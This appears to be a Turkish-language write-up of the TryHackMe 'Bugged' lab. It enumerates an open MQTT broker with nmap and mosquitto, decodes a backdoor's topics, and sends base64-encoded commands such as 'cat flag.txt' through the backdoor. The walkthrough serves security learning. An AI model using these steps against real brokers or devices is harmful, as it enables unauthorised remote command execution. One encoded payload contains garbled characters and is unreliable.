Post

Bugged

Posted
Preview Image
By Umut Sağlam 2 min read

nmap:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46

┌──(root㉿kali)-[~]
└─# nmap -T4 -sV -p 1883 -Pn -sS -sC  10.10.248.88 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-06 00:02 UTC
Nmap scan report for 10.10.248.88 (10.10.248.88)
Host is up (0.093s latency).

PORT     STATE SERVICE                  VERSION
1883/tcp open  mosquitto version 2.0.14
| mqtt-subscribe: 
|   Topics and their most recent payloads: 
|     $SYS/broker/uptime: 396 seconds
|     $SYS/broker/load/bytes/sent/1min: 392.12
|     $SYS/broker/load/sockets/1min: 0.96
|     $SYS/broker/version: mosquitto version 2.0.14
|     $SYS/broker/load/bytes/sent/15min: 209.39
|     $SYS/broker/load/messages/received/15min: 32.45
|     kitchen/toaster: {"id":1911086023739202115,"in_use":true,"temperature":158.96194,"toast_time":122}
|     frontdeck/camera: {"id":12584492580327769478,"yaxis":-135.17798,"xaxis":164.87808,"zoom":4.9513545,"movement":false}
|     $SYS/broker/messages/sent: 670
|     $SYS/broker/load/sockets/5min: 0.44
|     storage/thermostat: {"id":17418484530706111169,"temperature":23.365917}
|     $SYS/broker/load/bytes/received/1min: 4117.86
|     $SYS/broker/load/publish/sent/5min: 3.79
|     $SYS/broker/load/connections/1min: 0.96
|     $SYS/broker/load/messages/received/1min: 88.96
|     patio/lights: {"id":18439393988364281645,"color":"PURPLE","status":"OFF"}
|     $SYS/broker/load/connections/15min: 0.21
|     $SYS/broker/load/bytes/sent/5min: 410.94
|     $SYS/broker/messages/received: 603
|     $SYS/broker/bytes/sent: 5186
|     $SYS/broker/load/connections/5min: 0.44
|     $SYS/broker/load/publish/sent/1min: 0.96
|     $SYS/broker/load/messages/sent/1min: 89.92
|     livingroom/speaker: {"id":8543971176489709932,"gain":64}
|     $SYS/broker/publish/bytes/received: 20172
|     $SYS/broker/load/bytes/received/5min: 3125.71
|     $SYS/broker/load/sockets/15min: 0.21
|     $SYS/broker/bytes/received: 28390
|     $SYS/broker/load/messages/received/5min: 66.50
|     $SYS/broker/load/bytes/received/15min: 1526.82
|     $SYS/broker/load/messages/sent/5min: 70.29
|     $SYS/broker/load/publish/sent/15min: 2.08
|_    $SYS/broker/load/messages/sent/15min: 34.52

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.12 seconds

MQTT, makineden makineye iletişim için kullanılan, standart tabanlı bir mesajlama protokolü veya kurallar dizisidir. Akıllı sensörler, giyilebilir cihazlar ve başka nesnelerin interneti (IoT) cihazları, veri alışverişinde bulunmak için genelde sınırlı bant genişliğine sahip, kısık kaynaklı ağlar kullanmak zorundadır. Protokolün uygulanması basit olduğundan ve IoT verisini kolayca iletebildiğinden, IoT cihazları bu tarz veri iletimi için MQTT’yi kullanır. MQTT, cihazların birbirleri aracılığıyla bulutla ve bulutun cihazla mesajlaşmasını destekler.

Daha ayrıntılı bilgi toplamak için ‘mosquitto’ tool’unu kullanacağım.

Kurmak için:sudo apt-get install mosquitto mosquitto-clients -y

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

┌──(root㉿kali)-[~]
└─# mosquitto_sub -t "#" -h 10.10.248.88                                       
{"id":11020802636393548308,"yaxis":40.743423,"xaxis":39.99185,"zoom":4.788679,"movement":false}
{"id":7775467277534831317,"gain":49}
{"id":9188769425384942422,"temperature":23.354803}
{"id":7077681100260006541,"color":"BLUE","status":"ON"}
{"id":9561351088727157199,"in_use":false,"temperature":148.52513,"toast_time":181}
{"id":6431685341973848107,"temperature":23.56944}
{"id":10548951761765568350,"gain":51}
{"id":18096689562122606512,"color":"GREEN","status":"OFF"}
{"id":11139074985325934205,"temperature":23.71404}
{"id":2594140563300221266,"yaxis":110.61658,"xaxis":-174.8534,"zoom":1.9174262,"movement":false}
{"id":11600223946097860301,"in_use":false,"temperature":154.23352,"toast_time":212}
{"id":14485071012955464635,"gain":41}
{"id":15951135894745734063,"temperature":24.273884}
{"id":10655198988570014405,"color":"BLUE","status":"ON"}
{"id":5348173332577154178,"gain":68}
{"id":13794493104315577823,"in_use":false,"temperature":142.15854,"toast_time":358}
{"id":3559706274822825947,"temperature":23.533756}
{"id":16035775462361228654,"yaxis":-126.299545,"xaxis":32.90918,"zoom":1.4865787,"movement":false}
{"id":4593580109866002279,"gain":65}
{"id":5293604391322172376,"color":"RED","status":"ON"}
eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlZ2lzdGVyZWRfY29tbWFuZHMiOlsiSEVMUCIsIkNNRCIsIlNZUyJdLCJwdWJfdG9waWMiOiJVNHZ5cU5sUXRmLzB2b3ptYVp5TFQvMTVIOVRGNkNIZy9wdWIiLCJzdWJfdG9waWMiOiJYRDJyZlI5QmV6L0dxTXBSU0VvYmgvVHZMUWVoTWcwRS9zdWIifQ==
{"id":6802073417497390432,"temperature":23.749607}
{"id":971046693020516785,"in_use":true,"temperature":150.74762,"toast_time":290}
{"id":14159067284096886061,"gain":46}
{"id":17814563992915544517,"temperature":24.458862}
{"id":4777869983458155195,"color":"RED","status":"ON"}
{"id":714836790595205573,"yaxis":-79.81416,"xaxis":-125.57585,"zoom":3.9788232,"movement":false}
{"id":8937915394879815327,"temperature":24.392555}
{"id":17654776029895610496,"in_use":false,"temperature":155.53123,"toast_time":131}
{"id":13718822728532730453,"gain":59}
{"id":11275610268242984704,"color":"BLUE","status":"ON"}
{"id":17034581805727403042,"temperature":23.56617}
{"id":10575714719919727192,"gain":49}

Base64 ile kodlanmış bir dize buluyorum.

1
2
3

┌──(root㉿kali)-[~]
└─# echo "eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlZ2lzdGVyZWRfY29tbWFuZHMiOlsiSEVMUCIsIkNNRCIsIlNZUyJdLCJwdWJfdG9waWMiOiJVNHZ5cU5sUXRmLzB2b3ptYVp5TFQvMTVIOVRGNkNIZy9wdWIiLCJzdWJfdG9waWMiOiJYRDJyZlI5QmV6L0dxTXBSU0VvYmgvVHZMUWVoTWcwRS9zdWIifQ==" | base64 -d
{"id":"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d","registered_commands":["HELP","CMD","SYS"],"pub_topic":"U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub","sub_topic":"XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub"}

İlginç, bilinmeyen cihazla etkileşime geçilebiliyor gibi görünüyor ve hangi konuya abone olduğunu biliyoruz. Şimdi nasıl tepki vereceğini görmek için ona bir komut göndermeyi deneyelim:

1
2
3
4

mosquitto_sub -t "U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub" -h 10.10.248.88
SW52YWxpZCBtZXNzYWdlIGZvcm1hdC4KRm9ybWF0OiBiYXNlNjQoeyJpZCI6ICI8YmFja2Rvb3IgaWQ+IiwgImNtZCI6ICI8Y29tbWFuZD4iLCAiYXJnIjogIjxhcmd1bWVudD4ifSk=

mosquitto_pub -h 10.10.248.88 -t XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub -m '{"HELP"}'

Bu cihaz ağa açılan bir backdoor.

İlk mesajdan aldığımız ID’yi kullanarak şu komutu gönderebiliriz:

”{“id”: “cdd1b1c0–1c40–4b0f-8e22–61b357548b7d”, “cmd”: “CMD”, “arg”: “ls”}” komutu base64 ile encode ediyoruz: eyJpZCI6ICJjZGQxYjFjMC0xYzQwLTRiMGYtOGUyMi02MWIzNTc1NDhiN2QiLCAiY21kIjogIkNNRCIsICJhcmciOiAibHMifQ==

Cihazdaki klasörde flag.txt dosyası olduğunu gördük.

”{“id”: “cdd1b1c0–1c40–4b0f-8e22–61b357548b7d”, “cmd”: “CMD”, “arg”: “cat flag.txt”}” komutunun base64 encode hali: eyJpZCI6ICJjZGQxYjFjMOKAkzFjNDDigJM0YjBmLThlMjLigJM2MWIzNTc1NDhiN2QiLCAiY21kIjogIkNNRCIsICJhcmciOiAiY2F0IGZsYWcudHh0In0=

Komutu gönderelim ve flag’i alalım.

TryHackMe
Easy
This post is licensed under CC BY 4.0 by the author.